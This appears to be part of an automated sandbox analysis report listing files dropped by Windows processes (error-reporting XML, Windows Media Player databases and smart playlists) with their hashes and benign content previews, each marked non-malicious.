                                            File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                            Category:dropped
                                            Size (bytes):8730
                                            Entropy (8bit):3.715738331864548
                                            Encrypted:false
                                            SSDEEP:192:R6l7wVeJyEOe6Y2DXnKrgmfZMu0apr089bcxyNftUm:R6lXJpOe6YKnKrgmftfcxYf7
                                            MD5:D1BA841238813AACA11ED81A841DCFD4
                                            SHA1:0280AC5CBF2891995460936EC269229D5BD464E1
                                            SHA-256:08C9A30B63A1707BDA545B5DB5450B9894093C11227977D68BFD5E4E900014DA
                                            SHA-512:0C3640FE112FDF4991801B6DA27671297263C582B62C9F0C5E7C006DE64C90F858B1E16CF87517AF70E3331FCD1153EF521F855B9EC6899B3B25E414EED02995
                                            Malicious:false
                                            Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.1.5.1.2.<./.P.i.

                                            C:\ProgramData\Microsoft\Windows\WER\Temp\WER9E48.tmp.xml

                                            Download File
                                            Process:C:\Windows\System32\WerFault.exe
                                            File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                            Category:dropped
                                            Size (bytes):4965
                                            Entropy (8bit):4.609452631119753
                                            Encrypted:false
                                            SSDEEP:48:cvIwWl8zsNmJg771I9epWpW8VYNYm8M4J5+fUkE6FoEyq8vkUkE//soe+S8JU+So:uIjfuI7FY7V5JW6mWk6//szLKd
                                            MD5:EFCC32B026CD88A0FE3468FD09811567
                                            SHA1:48C96AF090CADE9F46E2CAFF9F4F5BEDFDDFF392
                                            SHA-256:D6C462FBB603F7FD91567ABB2C3673FBE86EB59D9E12FB983ACA3BB8F931DD98
                                            SHA-512:AD6C597E7F31E8A8F2CBF2FCA8AF9922AC6FA70D933F34FB8A2448A1C821682180D73EE5206385EE928542269FCACEECA636E7AB2D7EBE0EF3FA4A3523B45CFC
                                            Malicious:false
                                            Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="395034" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                            C:\Users\user\AppData\Local\Microsoft\Media Player\CurrentDatabase_400.wmdb

                                            Download File
                                            Process:C:\Windows\System32\unregmp2.exe
                                            File Type:data
                                            Category:modified
                                            Size (bytes):1048576
                                            Entropy (8bit):1.0087776707762626
                                            Encrypted:false
                                            SSDEEP:768:d0aleDxcg7KGVp3zT13VuI61HOdrrA9abhr8fEwPRzitFrzAqUmNKX0JoJImdbaW:LZEItFPCklY+XqEMNTaBacgs
                                            MD5:2A1AE33A07F40B43BA4A202587851FDB
                                            SHA1:D34E7BAC1371DD7ECF928B97CD41EBB65D1019F6
                                            SHA-256:BA07C011B9242AB128E7F1CC828218FEA6591394005A3477C62B163DFE279BA5
                                            SHA-512:6D3E7F8AA0AFDDC962B6EB9037D6332A3280BE9707B86577716B5DE4ABE05B63AD31264262D8E1292C1EC3049FC7AE0DEAB0E506BF8E321247FD7DE3443F0FA4
                                            Malicious:false
                                            Preview:j................=.....B................ ..X.......S ...............!..........................................................................................................................................................................................................................................................................................................................................................................................................................................................L.......2........$.......$..........X.......W...W...1....................$..............................................................................................................................................................................................................................................................................................................................................................................................................................

                                            C:\Users\user\AppData\Local\Microsoft\Media Player\LocalMLS_3.wmdb

                                            Download File
                                            Process:C:\Windows\System32\unregmp2.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):69740
                                            Entropy (8bit):0.40229891689370273
                                            Encrypted:false
                                            SSDEEP:96:frpOZhcbtKNZt/UMUatv7Zt8UMbat7UMlatkOZtFLQtyLZtgtx2tBt:4ZhPnSnYnq
                                            MD5:82B8F394027C6481D987F37E0EDC32AD
                                            SHA1:9E0D57DD09F4EF65271F04293A24BBC16E6BA75B
                                            SHA-256:572BF92B4969FACDA732DEE96ACCB8F619B2C6F3E303D909CD269D127B895867
                                            SHA-512:911891DF5CC0D9F22FF9928C7454013573E5DA3510D581AFDBFD159CE0E5318366390F1CF0884436B6971F2BE6A22E68D1CE00B10894406F6AE7D377EA73B641
                                            Malicious:false
                                            Preview:W.i.n.d.o.w.s. .M.e.d.i.a. .P.l.a.y.e.r...C.o.m.p.r.e.s.s.e.d. .D.B. .I.m.a.g.e.......e...........`...`...8...0.........3.6.........P..KE......KE...........@..KE...........i.#.w.|D...A.........................4.@.....4.@........x..KE..."..KE...........l..KE...........<[S..v@.....}.......................4.@.....4.@...........KE...R..KE..............KE...........'a.e%.vA....9Y4g.....................4.@.....4.@...........KE...z..KE..............KE...........z....m.M...R..B......................4.@.....4.@...........KE......KE..............KE...........a.X.-D.M.k..... .....................4.@.....4.@S.......@..KE......KE...........0..KE............. ....A....r.......................4.@.....4.@S.......h..KE......KE...........Z..KE............1G....H..Q.*Q.`.....................4.@.....4.@...........KE...>..KE..............KE............_l....@...tL.m......................4.@.....4.@...........KE...f..KE..............KE............$....9G.....wfI.....................4.@.....4.@...........K

                                            C:\Users\user\AppData\Local\Microsoft\Media Player\Sync Playlists\en-CH\000093A4\01_Music_auto_rated_at_5_stars.wpl

                                            Download File
                                            Process:C:\Program Files (x86)\Windows Media Player\wmplayer.exe
                                            File Type:HTML document, ASCII text, with CRLF line terminators
                                            Category:dropped
                                            Size (bytes):1272
                                            Entropy (8bit):4.037947479559426
                                            Encrypted:false
                                            SSDEEP:12:x2G5/KDxwegG2SBZ5EkqfxI+/RWNVYAh1MsAvXC0R0NXqVSqCj7SNCjqCjhRNCj3:xtwxloG/rdAvyoCegICGgCGdKv
                                            MD5:159E63275630EC4C9747B664BD063938
                                            SHA1:BE4E32D7D022C3E3277E1ED65A21BEBCF787CE3F
                                            SHA-256:D54745665432625A904636E7675612C85026DA07E68F4E9D8DACBE98E5DEE844
                                            SHA-512:1A128D4F59424BCE6818C117F84DBFE16B7DA1543D7B2682460DA74839BFC6CFE805DA00112E17CBAAFDF4179E357B70FA0850FA722FB04F202E1D75E65EDB60
                                            Malicious:false
                                            Preview:<?wpl version="1.0"?>..<smil>.. <head>.. <meta name="Generator" content="Microsoft Windows Media Player -- 11.0.5428.4943"/>.. <title>Music auto rated at 5 stars</title>.. </head>.. <body>.. <seq>.. <smartPlaylist version="1.0.0.0">.. <querySet>.. <sourceFilter id="{4202947A-A563-4B05-A754-A1B4B5989849}" name="Music in my library">.. <fragment name="Effective Rating">.. <argument name="condition">Is At Least</argument>.. <argument name="value">5 stars</argument>.. </fragment>.. <fragment name="Sort by">.. <argument name="value">Album Artist</argument>.. <argument name="condition">Ascending</argument>.. </fragment>.. <fragment name="Sort by">.. <argument name="value">

                                            C:\Users\user\AppData\Local\Microsoft\Media Player\Sync Playlists\en-CH\000093A4\02_Music_added_in_the_last_month.wpl

                                            Download File
                                            Process:C:\Program Files (x86)\Windows Media Player\wmplayer.exe
                                            File Type:HTML document, ASCII text, with CRLF line terminators
                                            Category:dropped
                                            Size (bytes):1279
                                            Entropy (8bit):4.051212913630708
                                            Encrypted:false
                                            SSDEEP:12:x2G5/KDxwegG2W75EkqfxI+/RWNVYAh1MsAvXzJfjzbT6qCj7SNCjqCjhRNCjqCr:xtwxlsG/rdAvDJ3dgICGgCGdKv
                                            MD5:907BFC98CE854AE312127C952D8BE0F2
                                            SHA1:02DEFE8C5F9CC85742E45BA55E4FCFE326FD960C
                                            SHA-256:C475DC7423C2AD60F25ADAAC754CD8B68B57FF04F26ECEF78F3E5961B986A324
                                            SHA-512:DB4045F992BAD6AD660769A22345C5E0D965AE521D6828D612B15F0163622C629992C313A41BC9E381F9B0F098117EEF840D33100AF4C6A3634EB0013A7FE1C7
                                            Malicious:false
                                            Preview:<?wpl version="1.0"?>..<smil>.. <head>.. <meta name="Generator" content="Microsoft Windows Media Player -- 11.0.5428.4943"/>.. <title>Music added in the last month</title>.. </head>.. <body>.. <seq>.. <smartPlaylist version="1.0.0.0">.. <querySet>.. <sourceFilter id="{4202947A-A563-4B05-A754-A1B4B5989849}" name="Music in my library">.. <fragment name="Acquisition Date">.. <argument name="condition">Is Later Than</argument>.. <argument name="value">Last month</argument>.. </fragment>.. <fragment name="Sort by">.. <argument name="value">Album Artist</argument>.. <argument name="condition">Ascending</argument>.. </fragment>.. <fragment name="Sort by">.. <argument name="

                                            C:\Users\user\AppData\Local\Microsoft\Media Player\Sync Playlists\en-CH\000093A4\03_Music_rated_at_4_or_5_stars.wpl

                                            Download File
                                            Process:C:\Program Files (x86)\Windows Media Player\wmplayer.exe
                                            File Type:HTML document, ASCII text, with CRLF line terminators
                                            Category:dropped
                                            Size (bytes):1267
                                            Entropy (8bit):4.025849031008368
                                            Encrypted:false
                                            SSDEEP:12:x2G5/KDxwegG2bxOBZ5EkqfxI+/RWNVYAh1MsAvXMV/NXq2SqCj7SNCjqCjhRNCT:xtwxlgxDG/rdAvcVNvgICGgCGdKv
                                            MD5:6D791B697AF46D6777182AF7F18C2955
                                            SHA1:D73E8B5F4EE646C1C4AB6D23F3CB3394CB833CA8
                                            SHA-256:4825EB90140F6B2F4F7ED0DF66B24E10FF5D0DA70AF53EA495FD30B3AA791870
                                            SHA-512:268CF327A9F471D547AD1DAE47833CF6D722C08F9CBF5E7867A422282CE52DC320340DED93473A598903BFEE9BF6A1A3393779468DBEB27D3390DBD59E6D20BA
                                            Malicious:false
                                            Preview:<?wpl version="1.0"?>..<smil>.. <head>.. <meta name="Generator" content="Microsoft Windows Media Player -- 11.0.5428.4943"/>.. <title>Music rated at 4 or 5 stars</title>.. </head>.. <body>.. <seq>.. <smartPlaylist version="1.0.0.0">.. <querySet>.. <sourceFilter id="{4202947A-A563-4B05-A754-A1B4B5989849}" name="Music in my library">.. <fragment name="User Rating">.. <argument name="condition">Is At Least</argument>.. <argument name="value">4 stars</argument>.. </fragment>.. <fragment name="Sort by">.. <argument name="value">Album Artist</argument>.. <argument name="condition">Ascending</argument>.. </fragment>.. <fragment name="Sort by">.. <argument name="value">Album

                                            C:\Users\user\AppData\Local\Microsoft\Media Player\Sync Playlists\en-CH\000093A4\04_Music_played_in_the_last_month.wpl

                                            Download File
                                            Process:C:\Program Files (x86)\Windows Media Player\wmplayer.exe
                                            File Type:HTML document, ASCII text, with CRLF line terminators
                                            Category:dropped
                                            Size (bytes):1284
                                            Entropy (8bit):4.05476728806244
                                            Encrypted:false
                                            SSDEEP:12:x2G5/KDxwegG24Mp75EkqfxI+/RWNVYAh1MsAvXbbgNzbT6qCj7SNCjqCjhRNCj3:xtwxlMAG/rdAvHmdgICGgCGdKv
                                            MD5:F8D3A4CACF055F5EC5C62218EA50D290
                                            SHA1:974474CE3FE345D8015863BD6EA7242BA118532B
                                            SHA-256:201F2170812CF8041964C4D3C5EF539D96ADEBA6A68B69ECAED0AFFE3AE8E25F
                                            SHA-512:AC32CBEB05FAE672047705679043AECF9B56314BAA09C2D3ABB7EAC655710D7CB2C967EA1772767E366BB502E8AD6DE375302F51CA62A76D962EE539B45BFC21
                                            Malicious:false
                                            Preview:<?wpl version="1.0"?>..<smil>.. <head>.. <meta name="Generator" content="Microsoft Windows Media Player -- 11.0.5428.4943"/>.. <title>Music played in the last month</title>.. </head>.. <body>.. <seq>.. <smartPlaylist version="1.0.0.0">.. <querySet>.. <sourceFilter id="{4202947A-A563-4B05-A754-A1B4B5989849}" name="Music in my library">.. <fragment name="Last play date">.. <argument name="condition">Is More Recent Than</argument>.. <argument name="value">Last month</argument>.. </fragment>.. <fragment name="Sort by">.. <argument name="value">Album Artist</argument>.. <argument name="condition">Ascending</argument>.. </fragment>.. <fragment name="Sort by">.. <argument n

                                            C:\Users\user\AppData\Local\Microsoft\Media Player\Sync Playlists\en-CH\000093A4\05_Pictures_taken_in_the_last_month.wpl

                                            Download File
                                            Process:C:\Program Files (x86)\Windows Media Player\wmplayer.exe
                                            File Type:HTML document, ASCII text, with CRLF line terminators
                                            Category:dropped
                                            Size (bytes):797
                                            Entropy (8bit):4.313068810170943
                                            Encrypted:false
                                            SSDEEP:12:x2G5/KDxwe3tfUa75EkqfxI+/RWNVAiWMAAvXO7/jzbT6qCjWBX2WN8M+Vv:xtwx/5sG/4xAvAXddKv
                                            MD5:821D2BE672F05514127C117CEF460C6E
                                            SHA1:1C75F314E7658A3DCDCAD315E301F2BAE6D47B31
                                            SHA-256:3ABDB6CBD88AD1557054ECE3F10DD1A8494ED32F423B3CF8321B18DECC489474
                                            SHA-512:146D6293173B80FFE3721AE6E61293CC1D838E8A72713BE8B859CE33C69EF753408057BE9CE15A78D573E253548EE674CA3FEA77EFA3D330CE8C8A50F8A8A988
                                            Malicious:false
                                            Preview:<?wpl version="1.0"?>..<smil>.. <head>.. <meta name="Generator" content="Microsoft Windows Media Player -- 9.0.0.3442"/>.. <title>Pictures taken in the last month</title>.. </head>.. <body>.. <seq>.. <smartPlaylist version="1.0.0.0">.. <querySet>.. <sourceFilter id="{CC823400-A8E4-4081-B073-D3B6D952FE69}" name="Pictures in my library">.. <fragment name="DateTimeTaken">.. <argument name="condition">Is Later Than</argument>.. <argument name="value">Last month</argument>.. </fragment>.. </sourceFilter>.. </querySet>.. </smartPlaylist>.. </seq>.. </body>..</smil>..

                                            C:\Users\user\AppData\Local\Microsoft\Media Player\Sync Playlists\en-CH\000093A4\06_Pictures_rated_4_or_5_stars.wpl

                                            Download File
                                            Process:C:\Program Files (x86)\Windows Media Player\wmplayer.exe
                                            File Type:HTML document, ASCII text, with CRLF line terminators
                                            Category:dropped
                                            Size (bytes):785
                                            Entropy (8bit):4.281070989332542
                                            Encrypted:false
                                            SSDEEP:12:x2G5/KDxwe3tfUZOBZ5EkqfxI+/RWNVAiWMAAvXMV/NXq2SqCjWBX2WN8M+Vv:xtwx/56DG/4xAvcVNvdKv
                                            MD5:0A8A40CA87323DC16893194B00C7FE77
                                            SHA1:B88A42A85053E0A7483E331B66BA5A40A6290E10
                                            SHA-256:9AA433BED2E090CC6904F1C24D5A7B5A1ED6D8F71A997E661B886C69383FD53E
                                            SHA-512:5932F09106D622054E6D624221D754FF471E3F37D9F585ED23DB7F7327FE1E2F624B22A8F7F2827B607FDB9A30683B8F20C48A39CD35A57AD5CB78467AF2C20E
                                            Malicious:false
                                            Preview:<?wpl version="1.0"?>..<smil>.. <head>.. <meta name="Generator" content="Microsoft Windows Media Player -- 9.0.0.3442"/>.. <title>Pictures rated 4 or 5 stars</title>.. </head>.. <body>.. <seq>.. <smartPlaylist version="1.0.0.0">.. <querySet>.. <sourceFilter id="{CC823400-A8E4-4081-B073-D3B6D952FE69}" name="Pictures in my library">.. <fragment name="User Rating">.. <argument name="condition">Is At Least</argument>.. <argument name="value">4 stars</argument>.. </fragment>.. </sourceFilter>.. </querySet>.. </smartPlaylist>.. </seq>.. </body>..</smil>..

                                            C:\Users\user\AppData\Local\Microsoft\Media Player\Sync Playlists\en-CH\000093A4\07_TV_recorded_in_the_last_week.wpl

                                            Download File
                                            Process:C:\Program Files (x86)\Windows Media Player\wmplayer.exe
                                            File Type:HTML document, ASCII text, with CRLF line terminators
                                            Category:dropped
                                            Size (bytes):1040
                                            Entropy (8bit):4.191452381408781
                                            Encrypted:false
                                            SSDEEP:12:x2G5/KDxwegG2b8C5EkqfxI+/RWNV7n5VvoZAvX1Hfjz+1qCjH1LNCjqCjWBX2W0:xtwxlftG/T5VaAvFmkcCGdKv
                                            MD5:B9987B1F9DF6D0AFC01558B907E62A16
                                            SHA1:EF202D5D6F90B37C71CB757F3BABB0857CE54D86
                                            SHA-256:0892EFDB8459D81D4C5E1085239734D9910B9C6A1DEBD7189CF385141F0B19D1
                                            SHA-512:6BC86075632C3E56FFE1D371F4178299E93E014F5C5C83DFDCA2DC9EFD1155633409C79EC87CFE2AFD4374B83771AE56A3EB7FAC00F83921B433CB49216037F9
                                            Malicious:false
                                            Preview:<?wpl version="1.0"?>..<smil>.. <head>.. <meta name="Generator" content="Microsoft Windows Media Player -- 11.0.5428.4943"/>.. <title>TV recorded in the last week</title>.. </head>.. <body>.. <seq>.. <smartPlaylist version="1.0.0.0">.. <querySet>.. <sourceFilter id="{E5415A66-7763-4BDE-B97F-5557CA73C303}" name="TV shows in my library">.. <fragment name="Recording Date">.. <argument name="condition">Is Later Than</argument>.. <argument name="value">Last week</argument>.. </fragment>.. <fragment name="Sort by">.. <argument name="value">Recording Date</argument>.. <argument name="condition">Ascending</argument>.. </fragment>.. </sourceFilter>.. </querySet>.. </smartPlaylist>

                                            C:\Users\user\AppData\Local\Microsoft\Media Player\Sync Playlists\en-CH\000093A4\08_Video_rated_at_4_or_5_stars.wpl

                                            Download File
                                            Process:C:\Program Files (x86)\Windows Media Player\wmplayer.exe
                                            File Type:HTML document, ASCII text, with CRLF line terminators
                                            Category:dropped
                                            Size (bytes):1020
                                            Entropy (8bit):4.1337368900668165
                                            Encrypted:false
                                            SSDEEP:12:x2G5/KDxwegG2bxOBZ5EkqfxI+/RWNVz3pnDCAAvXMV/NXq2SqCjQNCjqCjWBX2D:xtwxlYxDG/LJXAvcVNv/CGdKv
                                            MD5:A3787A42B81FCE0E448976AD158EDD93
                                            SHA1:45FF275C0C32EAB1F0B56E8B61E8EAD18CFD1675
                                            SHA-256:94BC17AC59BDE92FBCA00FCC69AED68FCBFE2C1754DD45F4810765F5FDF774FF
                                            SHA-512:B36CA10F580EC9D455FB57149BCE1897FE48FDA6023B2FB55B6B4B80A91F1754311B91EDD72C13103E0DA9ED90B696C28D6904EA91984ADE69ED50791F4065AE
                                            Malicious:false
                                            Preview:<?wpl version="1.0"?>..<smil>.. <head>.. <meta name="Generator" content="Microsoft Windows Media Player -- 11.0.5428.4943"/>.. <title>Video rated at 4 or 5 stars</title>.. </head>.. <body>.. <seq>.. <smartPlaylist version="1.0.0.0">.. <querySet>.. <sourceFilter id="{B2D9BDDC-8E49-444B-9BA4-193ABF9C7870}" name="Video in my library">.. <fragment name="User Rating">.. <argument name="condition">Is At Least</argument>.. <argument name="value">4 stars</argument>.. </fragment>.. <fragment name="Sort by">.. <argument name="value">Title</argument>.. <argument name="condition">Ascending</argument>.. </fragment>.. </sourceFilter>.. </querySet>.. </smartPlaylist>.. </seq>..

                                            C:\Users\user\AppData\Local\Microsoft\Media Player\Sync Playlists\en-CH\000093A4\09_Music_played_the_most.wpl

                                            Download File
                                            Process:C:\Program Files (x86)\Windows Media Player\wmplayer.exe
                                            File Type:HTML document, ASCII text, with CRLF line terminators
                                            Category:dropped
                                            Size (bytes):1025
                                            Entropy (8bit):4.153394340103766
                                            Encrypted:false
                                            SSDEEP:12:x2G5/KDxwe3f4MUWZ35EkqfxI+/RWNVYAh1MsAvXj/zbCjqCH/zxqCjWBX2WN8M+:xtwx/hUTG/rdAvTCGDdKv
                                            MD5:467E71AA2FD951EB0A1AF3D6BB8378E8
                                            SHA1:FB654C0B2663D4FA5FD0F1658097D936DD0429ED
                                            SHA-256:A54BC2CAD63CED4FD9FF2A3A094A26E264E8A5CE8139193896D13236F494E2EE
                                            SHA-512:F9242A4925B910F4A114652967A6E2F49444A3F0D9F35402FEF28CC8D39C58720930084112BAF92EB6716AF541FD76E3803CCC1E742CEC07F1D4FB6ABC13A42C
                                            Malicious:false
                                            Preview:<?wpl version="1.0"?>..<smil>.. <head>.. <meta name="Generator" content="Microsoft Windows Media Player -- 9.0.0.3075"/>.. <title>Music played the most</title>.. </head>.. <body>.. <seq>.. <smartPlaylist version="1.0.0.0">.. <querySet>.. <sourceFilter id="{4202947A-A563-4B05-A754-A1B4B5989849}" name="Music in my library">.. <fragment name="Sort by">.. <argument name="value">Playcount: Total</argument>.. <argument name="condition">Descending</argument>.. </fragment>.. <fragment name="Playcount: Total">.. <argument name="condition">Is Greater Than</argument>.. <argument name="value">5</argument>.. </fragment>.. </sourceFilter>.. </querySet>.. </smartPlaylist>.. </seq

                                            C:\Users\user\AppData\Local\Microsoft\Media Player\Sync Playlists\en-CH\000093A4\10_All_Music.wpl

                                            Download File
                                            Process:C:\Program Files (x86)\Windows Media Player\wmplayer.exe
                                            File Type:HTML document, ASCII text, with CRLF line terminators
                                            Category:dropped
                                            Size (bytes):1063
                                            Entropy (8bit):4.198592374702475
                                            Encrypted:false
                                            SSDEEP:12:x2G5/KDxwegG2dL55EkqfxI+/RWNVYAh1MsAvXj7SNCjqCjhRNCjqCjWBX2WN8M+:xtwxloYG/rdAvXICGgCGdKv
                                            MD5:51AEED11707741118E0706C1259DF22E
                                            SHA1:6434E915B018C6D15898FE0A4D006BBE3E1EDB60
                                            SHA-256:EC286113E5AD77AC34063589A137A6DC4B4CAB8845CD9C5386519983FA3B48F0
                                            SHA-512:A674487F9CABE1FB2809CD98958DCE696F7F066D3738BFB30317201ED804DF3C72F2D24D6F9C0832CF446C8A965E21F3EA50AADA1C69860A12340D6ECA88E942
                                            Malicious:false
                                            Preview:<?wpl version="1.0"?>..<smil>.. <head>.. <meta name="Generator" content="Microsoft Windows Media Player -- 11.0.5428.4943"/>.. <meta name="DontCopyToDevice" content="TRUE"/>.. <title>All Music</title>.. </head>.. <body>.. <seq>.. <smartPlaylist version="1.0.0.0">.. <querySet>.. <sourceFilter id="{4202947A-A563-4B05-A754-A1B4B5989849}" name="Music in my library">.. <fragment name="Sort by">.. <argument name="value">Album Artist</argument>.. <argument name="condition">Ascending</argument>.. </fragment>.. <fragment name="Sort by">.. <argument name="value">Album Title</argument>.. <argument name="condition">Ascending</argument>.. </fragment>.. </sourceFilter>.. </querySet>..

                                            C:\Users\user\AppData\Local\Microsoft\Media Player\Sync Playlists\en-CH\000093A4\11_All_Pictures.wpl

                                            Download File
                                            Process:C:\Program Files (x86)\Windows Media Player\wmplayer.exe
                                            File Type:HTML document, ASCII text, with CRLF line terminators
                                            Category:dropped
                                            Size (bytes):585
                                            Entropy (8bit):4.586939224969076
                                            Encrypted:false
                                            SSDEEP:12:x2G5/KDxweAxdL535EkqfxI+/RWNVAiWMAAvXjWBX2WN8M+Vv:xtwxYf9qG/4xAv+Kv
                                            MD5:74294EF495559ED32731F19096D70312
                                            SHA1:FDC6CC849270016D2A382D7D0DAABF44A4556CD9
                                            SHA-256:DB34D82F2CD23E6E55A64E12D2A0A9C27AC2DED156483238F22A336CA6825110
                                            SHA-512:B068D903B83945F146ABD4CF384DA99AF608643C62B647EA65DB33C3B0E0FACE4727A74BE3210A9C6469BBC403D1F5C59D92CBD57722737E992B0E4F5E66662A
                                            Malicious:false
                                            Preview:<?wpl version="1.0"?>..<smil>.. <head>.. <meta name="Generator" content="Microsoft Windows Media Player -- 10.0.0.3449"/>.. <meta name="DontCopyToDevice" content="TRUE"/>.. <title>All Pictures</title>.. </head>.. <body>.. <seq>.. <smartPlaylist version="1.0.0.0">.. <querySet>.. <sourceFilter id="{CC823400-A8E4-4081-B073-D3B6D952FE69}" name="Pictures in my library">.. </sourceFilter>.. </querySet>.. </smartPlaylist>.. </seq>.. </body>..</smil>..

                                            C:\Users\user\AppData\Local\Microsoft\Media Player\Sync Playlists\en-CH\000093A4\12_All_Video.wpl

                                            Download File
                                            Process:C:\Program Files (x86)\Windows Media Player\wmplayer.exe
                                            File Type:HTML document, ASCII text, with CRLF line terminators
                                            Category:dropped
                                            Size (bytes):1079
                                            Entropy (8bit):4.232889887576815
                                            Encrypted:false
                                            SSDEEP:12:x2G5/KDxwegG2dLx5EkqfxI+/RWNVz3pnDCAAvXnefVDKrqCjH1LbCjqCjWBX2W0:xtwxlowG/LJXAvXedKeMCGdKv
                                            MD5:372D0BEEBEA5460409A6A1C53AC52A18
                                            SHA1:1B5A925E00F9A4CC3A18FEB8F74A2E39EF11EEB6
                                            SHA-256:5B8B62B35E5DD8A46CCCCAF3FC3743BE9E0965D24CBCD20DA2681065EEB37EF3
                                            SHA-512:EFB412E3A17F4EAB84FB9F99B9E420D18E23610A9A66BCD7298C3BA68FD24ABE0C1F2E58FAA411E059788D34F4CEDE45F9E25C6578D13FAEFB8EE79ACD50F2E0
                                            Malicious:false
                                            Preview:<?wpl version="1.0"?>..<smil>.. <head>.. <meta name="Generator" content="Microsoft Windows Media Player -- 11.0.5428.4943"/>.. <meta name="DontCopyToDevice" content="TRUE"/>.. <title>All Video</title>.. </head>.. <body>.. <seq>.. <smartPlaylist version="1.0.0.0">.. <querySet>.. <sourceFilter id="{B2D9BDDC-8E49-444B-9BA4-193ABF9C7870}" name="Video in my library">.. <fragment name="Secondary Media Type">.. <argument name="condition">Is Not</argument>.. <argument name="value">Video: TV show</argument>.. </fragment>.. <fragment name="Sort by">.. <argument name="value">Recording Date</argument>.. <argument name="condition">Descending</argument>.. </fragment>.. </sourceFilter>.. </

                                            C:\Users\user\AppData\Local\Microsoft\Windows Media\12.0\WMSDKNS.DTD

                                            Download File
                                            Process:C:\Windows\System32\unregmp2.exe
                                            File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                            Category:dropped
                                            Size (bytes):498
                                            Entropy (8bit):5.103913616294899
                                            Encrypted:false
                                            SSDEEP:12:TMbhJpIO1mcROtW/yF0T8YA+it/0zsFE/TYEGs/4w:qhJ+CTRSnF1wlwFUY6
                                            MD5:90BE2701C8112BEBC6BD58A7DE19846E
                                            SHA1:A95BE407036982392E2E684FB9FF6602ECAD6F1E
                                            SHA-256:644FBCDC20086E16D57F31C5BAD98BE68D02B1C061938D2F5F91CBE88C871FBF
                                            SHA-512:D618B473B68B48D746C912AC5FC06C73B047BD35A44A6EFC7A859FE1162D68015CF69DA41A5DB504DCBC4928E360C095B32A3B7792FCC6A38072E1EBD12E7CBE
                                            Malicious:false
                                            Preview:<?xml version="1.0" standalone="yes"?>..<!DOCTYPE document [..<!ELEMENT document (node*)>.. <!ATTLIST document WMSNameSpaceVersion CDATA "2.0">....<!ELEMENT node (node*)>.. <!ATTLIST node name CDATA #REQUIRED>.. <!ATTLIST node opcode ( create | remove | setval | clearval | rename | movebefore ) #REQUIRED>.. <!ATTLIST node secure ( true | false ) #IMPLIED>.. <!ATTLIST node type ( string | boolean | int32 | binary | int64 ) #IMPLIED>.. <!ATTLIST node value CDATA #IMPLIED>..]>..

                                            C:\Users\user\AppData\Local\Microsoft\Windows Media\12.0\WMSDKNS.XML

                                            Download File
                                            Process:C:\Windows\System32\unregmp2.exe
                                            File Type:exported SGML document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                            Category:dropped
                                            Size (bytes):10191
                                            Entropy (8bit):4.792342140217129
                                            Encrypted:false
                                            SSDEEP:96:/YkZRAF6zyHUhm77yB1pZYCEnfHrHH7B6xTGH+YCLV3zwULJEYCJWyHBt3zwFRh+:/2FV0bBPCfUdY
                                            MD5:7050D5AE8ACFBE560FA11073FEF8185D
                                            SHA1:5BC38E77FF06785FE0AEC5A345C4CCD15752560E
                                            SHA-256:CB87767C4A384C24E4A0F88455F59101B1AE7B4FB8DE8A5ADB4136C5F7EE545B
                                            SHA-512:A7A295AC8921BB3DDE58D4BCDE9372ED59DEF61D4B7699057274960FA8C1D1A1DAFF834A93F7A0698E9E5C16DB43AF05E9FD2D6D7C9232F7D26FFCFF5FC5900B
                                            Malicious:false
